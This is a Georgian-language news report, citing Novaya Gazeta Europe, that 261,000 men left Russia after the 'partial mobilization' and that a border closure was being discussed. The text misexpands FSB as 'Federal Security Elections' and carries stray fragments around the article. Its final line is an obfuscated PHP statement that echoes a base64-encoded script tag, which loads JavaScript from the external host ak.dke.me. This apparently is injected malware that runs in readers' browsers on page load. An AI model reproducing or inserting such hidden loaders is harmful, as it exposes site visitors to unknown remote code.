celsiusi
ავერსი შნაიდერი
„ნაწილობრივი მობილიზაციის“ გამოცხადების შემდეგ რუსეთი 261 ათასმა კაცმა დატოვა. ამის შესახებ „ნოვაია გაზეტა. ევროპა“ რუსეთის პრეზიდენტის ადმინისტრაციაში მომუშავე წყაროზე დაყრდნობით წერს.
 
წყაროს ცნობით, აღნიშნული მონაცემები რუსეთის პრეზიდენტის ადმინისტრაციისთვის FSB-ს მიწოდებული მონაცემებიდან ირკვევა და  მოიცავს 21 სექტემბრიდან 24 სექტემბრის საღამომდე პერიოდს. 
 
„ნოვაია გაზეტა. ევროპა“ აღნიშნავს, რომ მათ წყაროს ეჭვი ეპარება ამ რიცხვების ავთენტურობაში, რადგან მანამდე FSB (უსაფრთხოების ფედერალური არჩევნები) „ასე ჩქარა არ მუშაობდა“.
 
„პრეზიდენტის ადმინისტრაციაში ახლა ისეთი ვითარებაა, რომ უშიშროების ძალები და თავდაცვის სამინისტრო შეძლებენ პუტინის დარწმუნებას, რომ [ქვეყნიდან] გასასვლელი დაკეტოს, სანამ გვიან არ არის“, — განაცხადა მან.
 
წყაროს ინფორმაციით, უწყებების ხელმძღვანელებს სექტემბრის მეორე ნახევარში პუტინთან შეხვედრები არ აქვთ ჩანიშნული.
 
„ნოვაია გაზეტა. ევროპის“ ინფორმაციით, კიდევ ერთმა წყარომ უთხრა გამოცემას, რომ ჯერ არ უნახავს სახელმწიფო მეთაურის განკარგულების პროექტი საზღვრის ჩაკეტვასთან დაკავშირებით.
 
მანამდე რუსული მედია წყაროებზე დაყრდნობით იტყობინებოდა, რომ რუსეთის ხელისუფლება სამხედრო ასაკის მამაკაცებისთვის საზღვრების ჩაკეტვას ოკუპირებულ დონეცკში, ლუგანსკში, ხერსონსა და ზაპოროჟიის რეგიონებში რეფერენდუმის დასრულების შემდეგ აპირებს.
 
ასევე, Meduza-ს წყარო იტყობინებოდა, რომ უკრაინის ოკუპირებულ ტერიტორიებზე „რეფერენდუმების“ დასრულებამდე [27 სექტემბერი] რუსეთის მოქალაქე კაცებისთვის საზღვრის ჩაკეტვას არ აპირებდა ხელისუფლება, თუმცა ვითარება შეიძლება შეცვლილიყო, „თუ გადინება მასობრივი იქნებოდა“.
414
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");